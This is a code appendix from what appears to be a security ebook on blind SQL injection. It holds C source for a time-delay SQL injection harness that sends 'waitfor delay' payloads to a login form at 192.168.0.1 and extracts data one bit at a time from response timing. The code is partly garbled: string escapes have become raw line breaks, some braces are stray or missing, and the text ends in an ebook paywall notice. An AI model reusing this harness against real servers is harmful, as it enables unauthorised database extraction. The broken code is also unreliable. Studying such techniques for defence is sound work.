APPENDIX A

Example C Code for a Time-Delay SQL Injection Harness

int main( int argc, char *argv[] )
{
      int i, t;
      HANDLE h_thread[32];

      memset( out, 0, 1024 * 64 );

      if ( argc != 4 )
            return syntax();

      query = argv[1];
      bit_start = atoi( argv[2] );
      bit_end = atoi( argv[3] );

      for( i = bit_start; i < bit_end; i += 1 )
      {
            for( t = 0; t < 1; t++ )
            {
            h_thread[t] = (HANDLE)_beginthread( thread_proc, 0,
(void *)(i+t) );
            }

            if ( WaitForMultipleObjects( 1, h_thread, TRUE, 30000
) == WAIT_TIMEOUT )
            {
printf( "Error - timeout waiting for response
" );
                  return 1;
            }

            if ( ( out[ i / 8 ] == 0 ) && ( out[ (i / 8)
- 1 ] == 0 ) )
            {
                  printf("Done!
");
                  return 0;
            }
      }
      return 0;
}


int create_get_bit_request( char *query, int bit, char *request, int buff_len )
{
      char params[ 1024 * 64 ] = "";
      char content_length[32] = "";
      char tmp[32] = "";
      char query_string[1024 * 64] = "";
      int i;

      // create bit-retriveal query string
      safe_strcat( query_string, "'; ", buff_len );
      safe_strcat( query_string, query, buff_len );

      sprintf( params, " if (ascii(substring(@s, %d, 1)) & ( power(2,
%d))) > 0 waitfor delay '0:0:4'--", (bit / 8)+1, bit % 8 );
      safe_strcat( query_string, params, buff_len );

      params[0] = 0;

      safe_strcat( request, "POST /login.asp HTTP/1.1
", buff_len );
      safe_strcat( request, "Content-Type: application/x-www-form-
urlencoded
", buff_len );
      safe_strcat( request, "User-Agent: Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.0; Q312461)
", buff_len );
      safe_strcat( request, "Host: 192.168.0.1
", buff_len );
      safe_strcat( request, "Connection: Close
", buff_len );
      safe_strcat( request, "Cache-Control: no-cache
", buff_len );

      safe_strcat( params, "submit=Submit&Password=&Username=", 1024 *
64 );


      for( i = 0; i < (int)strlen( query_string ); i++ )
      {
            sprintf( tmp, "%%%x", query_string[i] );
            safe_strcat( params, tmp, 1024 * 64 );
      }
sprintf( content_length, "%d", strlen( params ) );

      safe_strcat( request, "Content-Length: ", buff_len );
      safe_strcat( request, content_length, buff_len );
      safe_strcat( request, "

", buff_len );

      safe_strcat( request, params, buff_len );

      return 1;
}


}

int thread_proc( int bit )
{
      char request[ 1024 * 64 ] = "";
      int num_zeroes = 0;

      request[0] = 0;
      create_get_bit_request( query, bit, request, 1024 * 64 );
      do_time_web_request( request, bit, out, len );

      printf( "String = %s
", out );

      return 0;
}

int do_time_web_request( char *request, int bit, char
*out_string, int len )
{
      char output[ 1024 * 64 ];
      int out_len = 1024 * 64;
      DWORD start;
      int byte = bit / 8;
      int bbit = bit % 8;

      start = GetTickCount();

      memset( output, 0, (1024 * 64) );

      Sleep(2000);

      WebGet( "192.168.0.1", 80, 0, request, output, &out_len );

      if ( ( GetTickCount() - start ) > 4000 )
      {
            printf( "bit %d	=1
", bit );
// set the bit
            if ( byte <= len )
                  out_string[byte] = out_string[byte] | (1 << bbit);
            else
                  printf("error - output string too short" );

            return 1;
      }
      else
      {
            printf( "bit %d	=0
", bit );

            return 0;
      }

      return 1;
..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset
3.129.39.152